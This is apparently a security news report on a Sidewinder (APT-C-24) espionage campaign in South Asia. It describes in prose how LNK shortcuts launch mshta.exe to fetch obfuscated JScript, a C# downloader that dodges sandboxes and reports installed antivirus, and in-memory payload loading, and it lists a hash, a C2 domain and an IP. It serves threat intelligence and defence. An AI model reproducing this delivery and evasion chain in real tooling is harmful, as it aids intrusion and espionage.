In a striking evolution of its tactics, the Sidewinder advanced persistent threat (APT) group—also known as APT-C-24 or “Rattlesnake”—has adopted a novel delivery mechanism leveraging Windows shortcut (LNK) files to orchestrate complex, multi-stage intrusions across South Asia.
Active since at least 2012 and targeting governments, energy utilities, military installations, and mining operations in Pakistan, Afghanistan, Nepal, Bhutan, and Myanmar, Sidewinder’s latest campaign exemplifies the group’s continued innovation in stealthy espionage operations.
Security researchers at the 360 Advanced Threat Research Institute uncovered a series of compressed archives containing three malicious LNK files each.
These archives, hosted on remote servers, employ carefully crafted filenames—such as “file 1.docx.lnk,” “file 2.docx.lnk,” and “file 3.docx.lnk”—to masquerade as benign documents.
When a victim executes any of these shortcuts, the Windows mshta.exe binary is invoked to fetch and execute an obfuscated JScript payload from a remote URL parameterized by “yui=0,” “yui=1,” or “yui=2.”
This approach abandons the group’s formerly favored equation of legacy Microsoft Office exploits (CVE-2017-0199 and CVE-2017-11882) in favor of a more flexible, fileless execution pathway.
Upon execution, the JScript harnesses multiple layers of obfuscation to unpack a disguised secondary payload. The script dumps Base64-encoded data directly to the victim’s TEMP directory under a deceptive “file 2.docx” filename.
Contrary to typical decoders, the script refrains from locally decoding the file, instead relying on a subsequent .NET component—delivered via mshta.exe—to decompress and deobfuscate the content in memory. This two-step procedure thwarts detection by antivirus engines that scan disk-based artifacts.
Profiling and Payload Deployment
The deobfuscated component, a heavily obfuscated C# downloader (MD5: 2e382c82d055e6e3a5feb9095d759735), initiates an environment reconnaissance routine.
It queries the number of CPU cores via WMI and exits prematurely if fewer than two cores are found, ensuring deployment only on sufficiently resourced systems.
It similarly verifies that physical memory exceeds 810 MB before proceeding, thereby avoiding resource-constrained environments typically associated with virtual machines used in sandbox analysis.
If environmental checks pass, the downloader inspects running processes for strings associated with security products—such as “Kaspersky” or “ESET NOD32 Antivirus.”
Detected names are appended as query parameters to the C2 URL, ostensibly to inform the attacker of the target’s security posture.
Following this, the downloader locates the dropped “file 2.docx,” performs Base64 decoding and decompression, and launches the decoy document to distract the user.
Finally, it retrieves a further payload from the C2 infrastructure, decrypts it via an XOR routine seeded with the first 32 bytes of data, and reflectively loads it into memory for remote control capabilities.
Confirming Attribution to Rattlesnake
The architecture of this attack mirrors Sidewinder previous campaigns, sharing hallmark characteristics such as multi-extension LNK filenames ending with dual suffixes and remote URLs suffixed by incremental numeric parameters.
Earlier archives employed “.jpg.lnk” extensions with “q=0,1,2” parameters, whereas the current wave uses “.docx.lnk” and “yui=0,1,2.” All C2 domains—including policy.mail163cn.info—resolve to IP 89.150.45.75 and exhibit consistent JARM fingerprints and HTTP headers (“HTTP/1.1 404 Not Found,” nginx), aligning with Rattlesnake’s infrastructure patterns.
Moreover, the inclusion of geographic indicators such as “nepal,” “army,” and “lk” in domain names echoes Sidewinder’s historical preference for region-specific subdomains.
The congruence of obfuscation algorithms, file naming conventions, and C2 hosting techniques leave little doubt that the “yui” LNK campaign is the handiwork of the APT-C-24 group.
As Sidewinder continues to refine its tradecraft, organizations operating in South Asia and beyond must remain vigilant against seemingly innocuous shortcuts.
Employing stringent execution policies for LNK files, disabling mshta.exe where feasible, and enforcing robust endpoint monitoring will be critical to detecting and mitigating this insidious threat.
Find this Story Interesting! Follow us on LinkedIn and X to Get More Instant Updates.
Source link
